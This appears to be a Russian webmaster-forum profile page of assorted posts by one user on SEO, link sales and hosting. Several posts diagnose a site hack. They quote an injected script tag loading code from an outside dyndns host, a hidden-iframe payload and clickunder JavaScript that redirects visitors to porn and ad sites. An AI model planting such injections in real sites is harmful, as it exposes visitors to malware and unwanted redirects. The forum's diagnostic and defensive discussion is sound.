dimcaster

dimcaster
Рейтинг
48
Регистрация
23.12.2009

Если 5 лет вели группу, то разбанить можно (если, конечно, доводы будут). Все мы люди.

Да там вроде ссылка на виду...

Logunova777:
До какого максимального размера можно поднять ТИЦ с помощью прогона?

У меня еще года два назад получалось до 80 через полгода. Но ссылки все равно плохо продаются.

Да в общем-то стоит пойти. Почему бы и нет?

Заказал ремонт, вот в чем была причина:

Значит, как все было: исполнительный файл, под названием fr1992.php загрузили в виде аватара на сервер

(в директорию \uploads\fotos\), выполнили, тем самым собрав информацию о сайте и добавив вирусный код.

Сам код заключается в подключении скрипта (javascript) стороннего сайта, где размещен фрейм (iframe).

Данный скрипт подключается в начале вывода всех страниц сайта.

Вот он:

<script src="http://epic-win.dyndns.org/host.php?id=159"></script><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01

Transitional//EN">

Как видим подключается сторонний java-script по адресу http://epic-win.dyndns.org/host.php?id=159

В данном файле код, написанный на javascript, который выводит на экран фрейм(ширина 10, высота 49 пиксилей),

но этот фрейм не видно так как он позиционирован сверху, над всей страницей:

document.write(’<div style="position: absolute;left: 0;bottom: 100%;">

<iframe src="http://epic-win.dyndns.org/forum.php" width="10" height="49"></iframe></div>’);

Убедиться в том, что там есть вирус можно через Яндекс или Антивирус Касперского.

Вирус был файле в \language\Russian\website.lng

Он был в очень страшной форме зашифрован и жутко спрятан.

Для предотвращения подобного, нужно убрать права на выполнение скриптов во всех папках uploads, оставить только на запись и чтение, выполнение - губит (744 выставить).

Да, без ковыряния движка этого не сделать. Может подскажете подходящую статью по этому поводу?

смотрим сюда:

CookieTest=navigator.cookieEnabled; if(CookieTest) { ClickUndercookie = GetCookie('clickunder'); if (ClickUndercookie == null) { var ExpDate = new Date (); ExpDate.setTime(ExpDate.getTime() + (24 * 60 * 60 * 1000)); SetCookie('clickunder','1',ExpDate, "/"); url = "http://activepr.ru/click/body.php?id=1091&hash=bed9b5cf94ffa1b2f7808ea68200eb7f"; parent.window.opener ? parent.window.opener.location = url : null; setTimeout ('parent.window.opener ? parent.window.opener.location = "http://xertv.com/out/" : null;',5000); setTimeout ('parent.window.opener ? parent.window.opener.location = "http://sex4porno.ru/" : null;',10000); } } function GetCookie (name) { var arg = name + "="; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return getCookieVal (j); i = document.cookie.indexOf(" ", i) + 1; if (i == 0) break; } return null; } function SetCookie (name, value) { var argv = SetCookie.arguments; var argc = SetCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + "=" + escape (value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : ""); }

т.е. когда переходим на свой сайт - открывается всякая порнуха в старом окне (конечно, если ссылка открывалась в новом).

а это цена за 1 клик:

Сегодня: $0.0007

на разных категориях получается, но нужно только на 1-й странице листинга.

подскажите, пожалуйста, как правильно ее указать в этих скобках?

dimcaster добавил 30.03.2010 в 10:39

товарищи! есть какие-нибудь мысли?

именно CPanel!

т.е. негатива не должно быть из-за форума?

dimcaster добавил 28.01.2010 в 10:26

после вчерашнего апа стало получше немного, даже пошли переходы на странички форума. слышал, что это как раз апдейты отфильтровали кучу каких-то ссылок и теперь саповские ссылки снова в почете :(

123 4
Всего: 40